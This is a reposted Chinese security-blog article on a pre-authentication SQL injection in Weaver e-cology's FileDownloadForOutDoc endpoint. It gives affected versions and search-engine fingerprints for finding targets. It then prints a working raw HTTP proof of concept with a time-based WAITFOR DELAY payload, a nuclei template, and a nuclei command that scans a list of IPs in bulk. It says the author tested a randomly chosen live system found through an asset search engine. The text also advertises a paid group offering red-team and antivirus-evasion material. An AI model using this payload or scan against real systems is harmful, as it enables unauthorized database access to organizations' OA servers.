泛微 e-cology(FileDownloadForOutDoc)前台SQL注入漏洞复现

admin

138635
文章

114
评论

2024年10月19日00:06:41评论30 views字数 2038阅读6分47秒阅读模式

现在只对常读和星标的公众号才展示大图推送，建议大家能把威零安全实验室“设为星标”，否则可能就看不到了啦！

泛微 e-cology(FileDownloadForOutDoc)前台SQL注入漏洞复现

免责声明

本文章仅用于信息安全防御技术分享，因用于其他用途而产生不良后果,作者不承担任何法律责任，请严格遵循中华人民共和国相关法律法规，禁止做一切违法犯罪行为。

由于传播、利用本公众号所发布的而造成的任何直接或者间接的后果及损失，均由使用者本人承担。威零安全实验室公众号及原文章作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

0x01影响范围

Ecology 9.x 补丁版本 < 10.58.0Ecology 8.x 补丁版本 < 10.58.0

0x02语法特征

app.name="泛微 e-cology 9.0 OA"app.name="泛微 e-cology OA"

0x03漏洞位置

泛微 e-cology(FileDownloadForOutDoc)前台SQL注入漏洞复现

poc如下：

POST //weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1Host: xxxxxCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9If-None-Match: "AyurgkJJwkD"If-Modified-Since: Sat, 15 Oct 2022 01:55:58 GMTConnection: closeContent-Length: 45fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1

目前nuclei已更新poc,地址：

https://github.com/UltimateSec/ultimaste-nuclei-templates/tree/main/ecology-oa

nuclei poc如下：

id: ecology-oa-filedownloadforoutdoc-sqliinfo:  name: EcologyOA filedownloadforoutdoc - SQL injection  author: unknown  severity: critical  description: EcologyOA filedownloadforoutdoc interface has SQL injection  tags: ecology-oa,sqlirequests:  - raw:      - |        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1        Host: {{Hostname}}        Accept: */*        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Connection: close                fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1    matchers:      - type: dsl        dsl:          - 'duration>=5'

0x04漏洞复现

使用app.name="泛微 e-cology 9.0 OA"在hunter随机挑选一个幸运儿，然后进行抓包，使用poc之后进行发包，观察数据的变化，如图所示：

泛微 e-cology(FileDownloadForOutDoc)前台SQL注入漏洞复现

使用nuclei批量进行Poc检测：

泛微 e-cology(FileDownloadForOutDoc)前台SQL注入漏洞复现

nuclei -t .pocsecology-oa-filedownloadforoutdoc-sqli.yaml -l .ip.txt -o vulns.txt

广告时刻

欢迎加入星球！

威零安全，星球永久开放，内容包括：实战报告+hvv红蓝资料+代码审计+免杀+渗透学习资源+各种资料文档+直播课短期一年，后续将开发自己的红队工具库供大家使用。有需要的可以添加后台微信联系本人。

泛微 e-cology(FileDownloadForOutDoc)前台SQL注入漏洞复现

或者翻到文章末尾添加机器人进群考察。

星球的最近主题和星球内部工具一些展示

泛微 e-cology(FileDownloadForOutDoc)前台SQL注入漏洞复现

PY交易

为了方便师傅们交流学习，我特意创建了一个群聊。内部会分享一些脱敏的漏洞报告,渗透测试实战案例，更有若干大牛巨佬分享经验。后续还会提供一些福利包括送书，小礼物等等，欢迎各位师傅进群交流

由于“威零安全交流群”群聊人数已满200人，扫码进不了的师傅可以添加机器人secbot回复“威零科技”即可加入群聊

泛微 e-cology(FileDownloadForOutDoc)前台SQL注入漏洞复现

原文始发于微信公众号（威零安全实验室）：泛微 e-cology(FileDownloadForOutDoc)前台SQL注入漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

泛微 e-cology(FileDownloadForOutDoc)前台SQL注入漏洞复现

现在只对常读和星标的公众号才展示大图推送，建议大家能把威零安全实验室“设为星标”，否则可能就看不到了啦！

Argo Events权限管理不当漏洞

Oracle E-Business Suite远程代码执行漏洞(CVE-2025-30727)

Apache Roller 漏洞让攻击者获得未经授权的访问

Oracle E-Business Suite远程代码执行漏洞（CVE-2025-30727）

Apache Roller 未经授权的访问漏洞

Gladinet漏洞CVE-2025-30406遭在野利用

安美酒店管理系统/get_user_enrollment.php接口 sql注入漏洞

Microsoft Edge信息泄露漏洞(CVE-2025-29834)

【已复现】Gladinet CentreStack & Triofox 远程RCE漏洞（CVE-2025-30406）

【成功复现】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)

发表评论

在线咨询

微信